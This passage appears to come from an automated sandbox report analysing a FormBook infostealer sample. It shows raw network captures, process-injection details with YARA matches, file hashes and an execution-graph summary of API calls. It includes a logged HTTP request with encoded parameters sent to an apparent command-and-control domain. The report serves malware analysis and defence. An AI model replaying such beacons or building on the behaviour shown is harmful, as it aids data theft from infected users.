                                                                Jan 11, 2025 09:16:10.742994070 CET1236INData Raw: 56 fd 55 8c d5 d0 4b cb 55 fe 7d 2e 49 cb f5 24 db d7 02 d9 2e 75 6a cf cd 76 be 48 05 4d a5 db a4 0a 99 20 71 b0 22 4e d2 4e 4b 8e 52 8c 31 22 0c 5d 22 78 d1 92 79 02 04 29 64 a3 cf 18 23 b9 80 7a 1c 17 98 f7 52 ba f8 12 d4 bb a0 86 5d c4 2e 5d
                                                                Data Ascii: VUKU}.I$.ujvHM q"NNKR1"]"xy)d#zR].]<0fi+(,XPNJ)<ZPTQZZH{VeO+xFz'*6WvXI0/7mj[;\8#MO.y,g$)}n89N
                                                                Jan 11, 2025 09:16:10.743010998 CET672INData Raw: 27 24 e8 69 1e 64 58 96 31 6d dd 09 e1 b3 71 98 9e 7f 0c ed ef a6 7f cd af e6 69 43 08 2f 69 1a 32 4c e9 ba e2 0b 88 b0 a6 f3 9c 60 1f 10 fa 34 be a4 6d 68 03 4c 69 4f 1f 7b 43 f8 3c 4c 5b c8 69 1c 11 fe 6c f6 69 db 11 86 93 2d cd 08 d3 5f ef 92
                                                                Data Ascii: '$idX1mqiC/i2L`4mhLiO{C<L[ili-_0U};~#9\)"Aa%gw83E<t&`<#CF*"Nv~]yr/)Yyx^^kg&2[k_n_Z[uzLx@<
                                                                Jan 11, 2025 09:16:10.743120909 CET1236INData Raw: aa 31 28 5b 9c 3e 14 c1 c5 e2 51 e9 ab 41 fc bb 45 37 a6 ab b8 07 b9 1b 69 36 3a e7 21 1a 37 81 75 cd af d1 0e da 8d 50 a4 85 58 4f 28 53 c3 59 4d 3b 61 13 e0 5b 33 c3 86 cc a1 f2 9e 1a d8 a1 27 38 d8 a9 ad ae a2 85 d3 3f 6a b8 42 16 59 6a 60 34
                                                                Data Ascii: 1([>QAE7i6:!7uPXO(SYM;a[3'8?jBYj`4c%<]0L~6,x~3l(m)Q4'0zCLXcA7JNft0J}w96Sr6{!/O8!s38!4}P,]&IL*ufH
                                                                Jan 11, 2025 09:16:10.743165970 CET1236INData Raw: cf 5d dc d7 67 ae 9a d0 6c e1 98 5f 1a 3e c7 17 78 0c 94 2d ae 08 4d 9c e3 c3 25 80 b3 c5 cb 20 dd e9 b9 fb 48 f5 c9 67 8b f7 7a c7 23 47 58 34 be 9a e9 b3 09 f8 d6 6a 6e 02 7d 6b b5 6e 02 73 6b b5 69 02 7b 6b b5 6d 02 77 6b b5 6b 82 f2 d6 ea b2
                                                                Data Ascii: ]gl_>x-M% Hgz#GX4jn}knski{kmwkk[&oHc8f*-CZC6*A2|}dPkkJYors7ZjXX@+\;<rqW#zFkR6}\kGofQ{Ckj.n#
                                                                Jan 11, 2025 09:16:10.747873068 CET1236INData Raw: 0f 77 35 b6 6a 9c 6d 2b 21 a5 23 05 f9 dd 6a ce 61 68 94 d6 36 95 e4 ff bc aa a7 fa 5a c9 64 fe 24 b1 1d 21 61 e8 88 3c a2 bc 66 5c 92 7f 83 cd 66 cc 93 c4 63 27 62 3a 48 61 c4 20 99 6f 32 21 c0 01 d1 f8 64 3e a5 87 27 77 b6 ab a4 35 a1 8a 98 c6
                                                                Data Ascii: w5jm+!#jah6Zd$!a<f\fc'b:Ha o2!d>'w5)=R?Uuu/'<)V?"Ro6fqBILu[5I2[x$`zy=\uD@n+9' 9[?lC5j'G&FnIE!"p?V


                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                20192.168.2.749989103.159.36.6680
                                                                TimestampBytes transferredDirectionData
                                                                Jan 11, 2025 09:16:12.105185032 CET493OUTGET /nfd2/?UfjxuDP=Nz4SRZ+ZcsWDvLDLaExFXoqxLF9RdDOa1L87IpfF7DS4rl0CQqW5nKUTlgEwSOCJB6dlUsv6D3EsaGzmyQ5ZH6APjZoiCJja95RSvj5+jnDMDZLlQYpKd2QqndCwykWooVuOpC6xjiJx&LRJdx=qxGHfdRH_npdPLS HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Connection: close
                                                                Host: www.rokeyfashion.store
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
                                                                Jan 11, 2025 09:16:13.295727968 CET526INHTTP/1.1 301 Moved Permanently
                                                                Connection: close
                                                                expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                cache-control: no-cache, must-revalidate, max-age=0
                                                                content-type: text/html; charset=UTF-8
                                                                x-redirect-by: WordPress
                                                                location: http://rokeyfashion.store/nfd2/?UfjxuDP=Nz4SRZ+ZcsWDvLDLaExFXoqxLF9RdDOa1L87IpfF7DS4rl0CQqW5nKUTlgEwSOCJB6dlUsv6D3EsaGzmyQ5ZH6APjZoiCJja95RSvj5+jnDMDZLlQYpKd2QqndCwykWooVuOpC6xjiJx&LRJdx=qxGHfdRH_npdPLS
                                                                x-litespeed-cache: miss
                                                                content-length: 0
                                                                date: Sat, 11 Jan 2025 08:16:13 GMT
                                                                server: LiteSpeed


                                                                Statistics

                                                                CPU Usage

                                                                Click to jump to process

                                                                Memory Usage

                                                                Click to jump to process

                                                                High Level Behavior Distribution

                                                                Click to dive into process behavior distribution

                                                                Behavior

                                                                Click to jump to process

                                                                System Behavior

                                                                General

                                                                Target ID:0
                                                                Start time:03:14:02
                                                                Start date:11/01/2025
                                                                Path:C:\Users\user\Desktop\xaqnaB0rcW.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\Desktop\xaqnaB0rcW.exe"
                                                                Imagebase:0x350000
                                                                File size:1'223'680 bytes
                                                                MD5 hash:DD5ACFFDE51EF27C585911DEA96C4336
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:low
                                                                Has exited:true

                                                                General

                                                                Target ID:2
                                                                Start time:03:14:02
                                                                Start date:11/01/2025
                                                                Path:C:\Windows\SysWOW64\svchost.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\Desktop\xaqnaB0rcW.exe"
                                                                Imagebase:0x620000
                                                                File size:46'504 bytes
                                                                MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1658897103.0000000003A50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1658225987.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1658953431.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:4
                                                                Start time:03:14:24
                                                                Start date:11/01/2025
                                                                Path:C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exe"
                                                                Imagebase:0xb90000
                                                                File size:140'800 bytes
                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2602361204.0000000002DE0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                Reputation:high
                                                                Has exited:false

                                                                General

                                                                Target ID:5
                                                                Start time:03:14:26
                                                                Start date:11/01/2025
                                                                Path:C:\Windows\SysWOW64\TCPSVCS.EXE
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Windows\SysWOW64\TCPSVCS.EXE"
                                                                Imagebase:0xde0000
                                                                File size:10'752 bytes
                                                                MD5 hash:73905DB831B4F37F0673D2DD5BBF7779
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2601035129.00000000006A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2602376251.0000000000930000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2600811626.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                Reputation:low
                                                                Has exited:false

                                                                General

                                                                Target ID:6
                                                                Start time:03:14:42
                                                                Start date:11/01/2025
                                                                Path:C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exe"
                                                                Imagebase:0xb90000
                                                                File size:140'800 bytes
                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2604361912.0000000005510000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                Reputation:high
                                                                Has exited:false

                                                                General

                                                                Target ID:8
                                                                Start time:03:14:54
                                                                Start date:11/01/2025
                                                                Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                Imagebase:0x7ff722870000
                                                                File size:676'768 bytes
                                                                MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Disassembly

                                                                Reset < >

                                                                  Execution Graph

                                                                  Execution Coverage:3.6%
                                                                  Dynamic/Decrypted Code Coverage:1.8%
                                                                  Signature Coverage:4.7%
                                                                  Total number of Nodes:1871
                                                                  Total number of Limit Nodes:149
                                                                  execution_graph 93198 3c9bec 93202 360ae0 Mailbox ___crtGetEnvironmentStringsW 93198->93202 93200 35ffe1 Mailbox 93201 361526 Mailbox 93293 39cc5c 86 API calls 4 library calls 93201->93293 93202->93200 93202->93201 93230 35fec8 93202->93230 93233 36f4ea 48 API calls 93202->93233 93235 3ca706 93202->93235 93237 3897ed InterlockedDecrement 93202->93237 93240 3b0d1d 93202->93240 93243 3b0d09 93202->93243 93248 35fe30 93202->93248 93277 3aef61 82 API calls 2 library calls 93202->93277 93278 3af0ac 90 API calls Mailbox 93202->93278 93279 39a6ef 48 API calls 93202->93279 93280 35ce19 93202->93280 93286 3ae822 335 API calls Mailbox 93202->93286 93206 36146e 93215 356eed 48 API calls 93206->93215 93208 360509 93296 39cc5c 86 API calls 4 library calls 93208->93296 93209 36f4ea 48 API calls 93209->93230 93211 361473 93295 39cc5c 86 API calls 4 library calls 93211->93295 93212 3ca246 93287 356eed 93212->93287 93214 3ca922 93215->93200 93218 356eed 48 API calls 93218->93230 93220 3ca873 93221 35d7f7 48 API calls 93221->93230 93222 3897ed InterlockedDecrement 93222->93230 93223 3ca30e 93223->93200 93291 3897ed InterlockedDecrement 93223->93291 93225 370f0a 52 API calls __cinit 93225->93230 93227 3ca973 93297 39cc5c 86 API calls 4 library calls 93227->93297 93229 3ca982 93230->93200 93230->93206 93230->93208 93230->93209 93230->93211 93230->93212 93230->93218 93230->93221 93230->93222 93230->93223 93230->93225 93230->93227 93231 3615b5 93230->93231 93246 361820 335 API calls 2 library calls 93230->93246 93247 361d10 59 API calls Mailbox 93230->93247 93294 39cc5c 86 API calls 4 library calls 93231->93294 93233->93202 93292 39cc5c 86 API calls 4 library calls 93235->93292 93237->93202 93298 3af8ae 93240->93298 93242 3b0d2d 93242->93202 93244 3af8ae 129 API calls 93243->93244 93245 3b0d19 93244->93245 93245->93202 93246->93230 93247->93230 93249 35fe50 93248->93249 93275 35fe7e 93248->93275 93250 36f4ea 48 API calls 93249->93250 93250->93275 93251 36146e 93252 356eed 48 API calls 93251->93252 93276 35ffe1 93252->93276 93253 36f4ea 48 API calls 93253->93275 93256 360509 93499 39cc5c 86 API calls 4 library calls 93256->93499 93257 356eed 48 API calls 93257->93275 93259 361473 93498 39cc5c 86 API calls 4 library calls 93259->93498 93260 3ca246 93262 356eed 48 API calls 93260->93262 93261 3ca922 93261->93202 93262->93276 93265 3ca873 93265->93202 93266 35d7f7 48 API calls 93266->93275 93267 3897ed InterlockedDecrement 93267->93275 93268 3ca30e 93268->93276 93496 3897ed InterlockedDecrement 93268->93496 93269 370f0a 52 API calls __cinit 93269->93275 93271 3ca973 93500 39cc5c 86 API calls 4 library calls 93271->93500 93273 3615b5 93497 39cc5c 86 API calls 4 library calls 93273->93497 93274 3ca982 93275->93251 93275->93253 93275->93256 93275->93257 93275->93259 93275->93260 93275->93266 93275->93267 93275->93268 93275->93269 93275->93271 93275->93273 93275->93276 93494 361820 335 API calls 2 library calls 93275->93494 93495 361d10 59 API calls Mailbox 93275->93495 93276->93202 93277->93202 93278->93202 93279->93202 93281 35ce28 __wsetenvp 93280->93281 93282 36ee75 48 API calls 93281->93282 93283 35ce50 ___crtGetEnvironmentStringsW 93282->93283 93284 36f4ea 48 API calls 93283->93284 93285 35ce66 93284->93285 93285->93202 93286->93202 93288 356f00 93287->93288 93289 356ef8 93287->93289 93288->93200 93501 35dd47 48 API calls ___crtGetEnvironmentStringsW 93289->93501 93291->93200 93292->93201 93293->93200 93294->93200 93295->93220 93296->93214 93297->93229 93334 35936c 93298->93334 93300 3af8ea 93302 3af92c Mailbox 93300->93302 93354 3b0567 93300->93354 93302->93242 93303 3afb8b 93304 3afcfa 93303->93304 93306 3afb95 93303->93306 93417 3b0688 89 API calls Mailbox 93304->93417 93367 3af70a 93306->93367 93308 3afd07 93308->93306 93310 3afd13 93308->93310 93309 35936c 81 API calls 93329 3af984 Mailbox 93309->93329 93310->93302 93315 3afbc9 93381 36ed18 93315->93381 93318 3afbfd 93388 36c050 93318->93388 93319 3afbe3 93387 39cc5c 86 API calls 4 library calls 93319->93387 93322 3afbee GetCurrentProcess TerminateProcess 93322->93318 93323 3afc14 93333 3afc3e 93323->93333 93399 361b90 93323->93399 93324 3afd65 93324->93302 93330 3afd7e FreeLibrary 93324->93330 93326 3afc2d 93415 3b040f 105 API calls _free 93326->93415 93328 361b90 48 API calls 93328->93333 93329->93302 93329->93303 93329->93309 93329->93329 93385 3b29e8 48 API calls ___crtGetEnvironmentStringsW 93329->93385 93386 3afda5 60 API calls 2 library calls 93329->93386 93330->93302 93333->93324 93333->93328 93416 35dcae 50 API calls Mailbox 93333->93416 93418 3b040f 105 API calls _free 93333->93418 93335 359384 93334->93335 93352 359380 93334->93352 93336 3c4cbd __i64tow 93335->93336 93337 3c4bbf 93335->93337 93338 359398 93335->93338 93346 3593b0 __itow Mailbox _wcscpy 93335->93346 93339 3c4bc8 93337->93339 93340 3c4ca5 93337->93340 93419 37172b 80 API calls 3 library calls 93338->93419 93345 3c4be7 93339->93345 93339->93346 93429 37172b 80 API calls 3 library calls 93340->93429 93344 3593ba 93348 35ce19 48 API calls 93344->93348 93344->93352 93347 36f4ea 48 API calls 93345->93347 93420 36f4ea 93346->93420 93350 3c4c04 93347->93350 93348->93352 93349 36f4ea 48 API calls 93351 3c4c2a 93349->93351 93350->93349 93351->93352 93353 35ce19 48 API calls 93351->93353 93352->93300 93353->93352 93452 35bdfa 93354->93452 93356 3b0582 CharLowerBuffW 93458 391f11 93356->93458 93363 3b05d2 93471 35b18b 93363->93471 93365 3b05de Mailbox 93366 3b061a Mailbox 93365->93366 93475 3afda5 60 API calls 2 library calls 93365->93475 93366->93329 93368 3af725 93367->93368 93372 3af77a 93367->93372 93369 36f4ea 48 API calls 93368->93369 93370 3af747 93369->93370 93371 36f4ea 48 API calls 93370->93371 93370->93372 93371->93370 93373 3b0828 93372->93373 93374 3b0a53 Mailbox 93373->93374 93380 3b084b _strcat _wcscpy __wsetenvp 93373->93380 93374->93315 93375 35cf93 58 API calls 93375->93380 93376 35d286 48 API calls 93376->93380 93377 35936c 81 API calls 93377->93380 93378 37395c 47 API calls __crtGetStringTypeA_stat 93378->93380 93380->93374 93380->93375 93380->93376 93380->93377 93380->93378 93489 398035 50 API calls __wsetenvp 93380->93489 93383 36ed2d 93381->93383 93382 36edc5 VirtualProtect 93384 36ed93 93382->93384 93383->93382 93383->93384 93384->93318 93384->93319 93385->93329 93386->93329 93387->93322 93389 36c064 93388->93389 93391 36c069 Mailbox 93388->93391 93490 36c1af 48 API calls 93389->93490 93397 36c077 93391->93397 93491 36c15c 48 API calls 93391->93491 93393 36f4ea 48 API calls 93395 36c108 93393->93395 93394 36c152 93394->93323 93396 36f4ea 48 API calls 93395->93396 93398 36c113 93396->93398 93397->93393 93397->93394 93398->93323 93400 361cf6 93399->93400 93401 361ba2 93399->93401 93400->93326 93404 36f4ea 48 API calls 93401->93404 93413 361bae 93401->93413 93403 361c5d 93403->93326 93406 3c49c4 93404->93406 93405 361bb9 93405->93403 93408 36f4ea 48 API calls 93405->93408 93407 36f4ea 48 API calls 93406->93407 93414 3c49cf 93407->93414 93409 361c9f 93408->93409 93410 361cb2 93409->93410 93492 352925 48 API calls 93409->93492 93410->93326 93412 36f4ea 48 API calls 93412->93414 93413->93405 93493 36c15c 48 API calls 93413->93493 93414->93412 93414->93413 93415->93333 93416->93333 93417->93308 93418->93333 93419->93346 93422 36f4f2 __calloc_impl 93420->93422 93423 36f50c 93422->93423 93424 36f50e std::exception::exception 93422->93424 93430 37395c 93422->93430 93423->93344 93444 376805 RaiseException 93424->93444 93426 36f538 93445 37673b 47 API calls _free 93426->93445 93428 36f54a 93428->93344 93429->93346 93431 3739d7 __calloc_impl 93430->93431 93437 373968 __calloc_impl 93430->93437 93451 377c0e 47 API calls __getptd_noexit 93431->93451 93434 37399b RtlAllocateHeap 93435 3739cf 93434->93435 93434->93437 93435->93422 93437->93434 93438 3739c3 93437->93438 93439 373973 93437->93439 93442 3739c1 93437->93442 93449 377c0e 47 API calls __getptd_noexit 93438->93449 93439->93437 93446 3781c2 47 API calls 2 library calls 93439->93446 93447 37821f 47 API calls 8 library calls 93439->93447 93448 371145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 93439->93448 93450 377c0e 47 API calls __getptd_noexit 93442->93450 93444->93426 93445->93428 93446->93439 93447->93439 93449->93442 93450->93435 93451->93435 93453 35be0d 93452->93453 93457 35be0a ___crtGetEnvironmentStringsW 93452->93457 93454 36f4ea 48 API calls 93453->93454 93455 35be17 93454->93455 93476 36ee75 93455->93476 93457->93356 93459 391f3b __wsetenvp 93458->93459 93460 391f79 93459->93460 93462 391f6f 93459->93462 93464 391ffa 93459->93464 93460->93365 93465 35d7f7 93460->93465 93462->93460 93487 36d37a 60 API calls 93462->93487 93464->93460 93488 36d37a 60 API calls 93464->93488 93466 36f4ea 48 API calls 93465->93466 93467 35d818 93466->93467 93468 36f4ea 48 API calls 93467->93468 93469 35d826 93468->93469 93470 3569e9 48 API calls ___crtGetEnvironmentStringsW 93469->93470 93470->93363 93472 35b199 93471->93472 93474 35b1a2 ___crtGetEnvironmentStringsW 93471->93474 93473 35bdfa 48 API calls 93472->93473 93472->93474 93473->93474 93474->93365 93475->93366 93478 36f4ea __calloc_impl 93476->93478 93477 37395c __crtGetStringTypeA_stat 47 API calls 93477->93478 93478->93477 93479 36f50c 93478->93479 93480 36f50e std::exception::exception 93478->93480 93479->93457 93485 376805 RaiseException 93480->93485 93482 36f538 93486 37673b 47 API calls _free 93482->93486 93484 36f54a 93484->93457 93485->93482 93486->93484 93487->93462 93488->93464 93489->93380 93490->93391 93491->93397 93492->93410 93493->93405 93494->93275 93495->93275 93496->93276 93497->93276 93498->93265 93499->93261 93500->93274 93501->93288 93502 3c19dd 93507 354a30 93502->93507 93504 3c19f1 93527 370f0a 52 API calls __cinit 93504->93527 93506 3c19fb 93508 354a40 __ftell_nolock 93507->93508 93509 35d7f7 48 API calls 93508->93509 93510 354af6 93509->93510 93528 355374 93510->93528 93512 354aff 93535 35363c 93512->93535 93519 35d7f7 48 API calls 93520 354b32 93519->93520 93557 3549fb 93520->93557 93522 354b3d _wcscat Mailbox __wsetenvp 93523 354b43 Mailbox 93522->93523 93524 35ce19 48 API calls 93522->93524 93525 3564cf 48 API calls 93522->93525 93526 3561a6 48 API calls 93522->93526 93523->93504 93524->93522 93525->93522 93526->93522 93527->93506 93571 37f8a0 93528->93571 93531 35ce19 48 API calls 93532 3553a7 93531->93532 93573 35660f 93532->93573 93534 3553b1 Mailbox 93534->93512 93536 353649 __ftell_nolock 93535->93536 93599 35366c GetFullPathNameW 93536->93599 93538 35365a 93539 356a63 48 API calls 93538->93539 93540 353669 93539->93540 93541 35518c 93540->93541 93542 355197 93541->93542 93543 3c1ace 93542->93543 93544 35519f 93542->93544 93545 356b4a 48 API calls 93543->93545 93601 355130 93544->93601 93548 3c1adb __wsetenvp 93545->93548 93547 354b18 93551 3564cf 93547->93551 93549 36ee75 48 API calls 93548->93549 93550 3c1b07 ___crtGetEnvironmentStringsW 93549->93550 93552 35651b 93551->93552 93556 3564dd ___crtGetEnvironmentStringsW 93551->93556 93554 36f4ea 48 API calls 93552->93554 93553 36f4ea 48 API calls 93555 354b29 93553->93555 93554->93556 93555->93519 93556->93553 93616 35bcce 93557->93616 93560 3c41cc RegQueryValueExW 93562 3c41e5 93560->93562 93563 3c4246 RegCloseKey 93560->93563 93561 354a2b 93561->93522 93564 36f4ea 48 API calls 93562->93564 93565 3c41fe 93564->93565 93622 3547b7 93565->93622 93568 3c423b 93568->93563 93569 3c4224 93570 356a63 48 API calls 93569->93570 93570->93568 93572 355381 GetModuleFileNameW 93571->93572 93572->93531 93574 37f8a0 __ftell_nolock 93573->93574 93575 35661c GetFullPathNameW 93574->93575 93580 356a63 93575->93580 93577 356643 93591 356571 93577->93591 93581 356adf 93580->93581 93583 356a6f __wsetenvp 93580->93583 93582 35b18b 48 API calls 93581->93582 93588 356ab6 ___crtGetEnvironmentStringsW 93582->93588 93584 356ad7 93583->93584 93585 356a8b 93583->93585 93598 35c369 48 API calls 93584->93598 93595 356b4a 93585->93595 93588->93577 93589 356a95 93590 36ee75 48 API calls 93589->93590 93590->93588 93592 35657f 93591->93592 93593 35b18b 48 API calls 93592->93593 93594 35658f 93593->93594 93594->93534 93596 36f4ea 48 API calls 93595->93596 93597 356b54 93596->93597 93597->93589 93598->93588 93600 35368a 93599->93600 93600->93538 93602 35513f __wsetenvp 93601->93602 93603 355151 93602->93603 93604 3c1b27 93602->93604 93611 35bb85 93603->93611 93606 356b4a 48 API calls 93604->93606 93608 3c1b34 93606->93608 93607 35515e ___crtGetEnvironmentStringsW 93607->93547 93609 36ee75 48 API calls 93608->93609 93610 3c1b57 ___crtGetEnvironmentStringsW 93609->93610 93612 35bb9b 93611->93612 93615 35bb96 ___crtGetEnvironmentStringsW 93611->93615 93613 36ee75 48 API calls 93612->93613 93614 3c1b77 93612->93614 93613->93615 93615->93607 93617 35bce8 93616->93617 93621 354a0a RegOpenKeyExW 93616->93621 93618 36f4ea 48 API calls 93617->93618 93619 35bcf2 93618->93619 93620 36ee75 48 API calls 93619->93620 93620->93621 93621->93560 93621->93561 93623 36f4ea 48 API calls 93622->93623 93624 3547c9 RegQueryValueExW 93623->93624 93624->93568 93624->93569 93625 3c8eb8 93629 39a635 93625->93629 93627 3c8ec3 93628 39a635 84 API calls 93627->93628 93628->93627 93635 39a66f 93629->93635 93637 39a642 93629->93637 93630 39a671 93650 36ec4e 81 API calls 93630->93650 93632 39a676 93633 35936c 81 API calls 93632->93633 93634 39a67d 93633->93634 93640 35510d 93634->93640 93635->93627 93637->93630 93637->93632 93637->93635 93638 39a669 93637->93638 93649 364525 61 API calls ___crtGetEnvironmentStringsW 93638->93649 93641 35511f 93640->93641 93642 3c1be7 93640->93642 93651 35b384 93641->93651 93660 38a58f 48 API calls ___crtGetEnvironmentStringsW 93642->93660 93645 35512b 93645->93635 93646 3c1bf1 93647 356eed 48 API calls 93646->93647 93648 3c1bf9 Mailbox 93647->93648 93649->93635 93650->93632 93652 35b392 93651->93652 93659 35b3c5 ___crtGetEnvironmentStringsW 93651->93659 93653 35b3fd 93652->93653 93654 35b3b8 93652->93654 93652->93659 93656 36f4ea 48 API calls 93653->93656 93655 35bb85 48 API calls 93654->93655 93655->93659 93657 35b407 93656->93657 93658 36f4ea 48 API calls 93657->93658 93658->93659 93659->93645 93660->93646 93661 fd8ee8 93675 fd6b38 93661->93675 93663 fd8f8f 93678 fd8dd8 93663->93678 93665 fd8fb8 CreateFileW 93667 fd900c 93665->93667 93668 fd9007 93665->93668 93667->93668 93669 fd9023 VirtualAlloc 93667->93669 93669->93668 93670 fd9041 ReadFile 93669->93670 93670->93668 93671 fd905c 93670->93671 93672 fd7dd8 13 API calls 93671->93672 93673 fd908f 93672->93673 93674 fd90b2 ExitProcess 93673->93674 93674->93668 93681 fd9fb8 GetPEB 93675->93681 93677 fd71c3 93677->93663 93679 fd8de1 Sleep 93678->93679 93680 fd8def 93679->93680 93682 fd9fe2 93681->93682 93682->93677 93683 3c19ba 93688 36c75a 93683->93688 93687 3c19c9 93689 35d7f7 48 API calls 93688->93689 93690 36c7c8 93689->93690 93696 36d26c 93690->93696 93693 36c865 93694 36c881 93693->93694 93699 36d1fa 48 API calls ___crtGetEnvironmentStringsW 93693->93699 93695 370f0a 52 API calls __cinit 93694->93695 93695->93687 93700 36d298 93696->93700 93699->93693 93701 36d2a5 93700->93701 93702 36d28b 93700->93702 93701->93702 93703 36d2ac RegOpenKeyExW 93701->93703 93702->93693 93703->93702 93704 36d2c6 RegQueryValueExW 93703->93704 93705 36d2e7 93704->93705 93706 36d2fc RegCloseKey 93704->93706 93705->93706 93706->93702 93707 3c197b 93712 36dd94 93707->93712 93711 3c198a 93713 36f4ea 48 API calls 93712->93713 93714 36dd9c 93713->93714 93715 36ddb0 93714->93715 93720 36df3d 93714->93720 93719 370f0a 52 API calls __cinit 93715->93719 93719->93711 93721 36df46 93720->93721 93722 36dda8 93720->93722 93752 370f0a 52 API calls __cinit 93721->93752 93724 36ddc0 93722->93724 93725 35d7f7 48 API calls 93724->93725 93726 36ddd7 GetVersionExW 93725->93726 93727 356a63 48 API calls 93726->93727 93728 36de1a 93727->93728 93753 36dfb4 93728->93753 93731 356571 48 API calls 93734 36de2e 93731->93734 93733 3c24c8 93734->93733 93757 36df77 93734->93757 93736 36debb 93738 36dee3 93736->93738 93739 36df31 GetSystemInfo 93736->93739 93737 36dea4 GetCurrentProcess 93766 36df5f LoadLibraryA GetProcAddress 93737->93766 93760 36e00c 93738->93760 93741 36df0e 93739->93741 93744 36df21 93741->93744 93745 36df1c FreeLibrary 93741->93745 93744->93715 93745->93744 93746 36df29 GetSystemInfo 93749 36df03 93746->93749 93747 36def9 93763 36dff4 93747->93763 93749->93741 93751 36df09 FreeLibrary 93749->93751 93751->93741 93752->93722 93754 36dfbd 93753->93754 93755 35b18b 48 API calls 93754->93755 93756 36de22 93755->93756 93756->93731 93767 36df89 93757->93767 93771 36e01e 93760->93771 93764 36e00c 2 API calls 93763->93764 93765 36df01 GetNativeSystemInfo 93764->93765 93765->93749 93766->93736 93768 36dea0 93767->93768 93769 36df92 LoadLibraryA 93767->93769 93768->93736 93768->93737 93769->93768 93770 36dfa3 GetProcAddress 93769->93770 93770->93768 93772 36def1 93771->93772 93773 36e027 LoadLibraryA 93771->93773 93772->93746 93772->93747 93773->93772 93774 36e038 GetProcAddress 93773->93774 93774->93772 93775 353742 93776 35374b 93775->93776 93777 353769 93776->93777 93778 3537c8 93776->93778 93815 3537c6 93776->93815 93782 353776 93777->93782 93783 35382c PostQuitMessage 93777->93783 93780 3537ce 93778->93780 93781 3c1e00 93778->93781 93779 3537ab DefWindowProcW 93817 3537b9 93779->93817 93784 3537f6 SetTimer RegisterWindowMessageW 93780->93784 93785 3537d3 93780->93785 93824 352ff6 16 API calls 93781->93824 93787 3c1e88 93782->93787 93788 353781 93782->93788 93783->93817 93793 35381f CreatePopupMenu 93784->93793 93784->93817 93790 3c1da3 93785->93790 93791 3537da KillTimer 93785->93791 93839 394ddd 60 API calls _memset 93787->93839 93794 353836 93788->93794 93795 353789 93788->93795 93800 3c1ddc MoveWindow 93790->93800 93801 3c1da8 93790->93801 93820 353847 Shell_NotifyIconW _memset 93791->93820 93792 3c1e27 93825 36e312 335 API calls Mailbox 93792->93825 93793->93817 93822 36eb83 53 API calls _memset 93794->93822 93796 3c1e6d 93795->93796 93797 353794 93795->93797 93796->93779 93838 38a5f3 48 API calls 93796->93838 93804 35379f 93797->93804 93805 3c1e58 93797->93805 93798 3c1e9a 93798->93779 93798->93817 93800->93817 93807 3c1dac 93801->93807 93808 3c1dcb SetFocus 93801->93808 93804->93779 93826 353847 Shell_NotifyIconW _memset 93804->93826 93837 3955bd 70 API calls _memset 93805->93837 93806 353845 93806->93817 93807->93804 93810 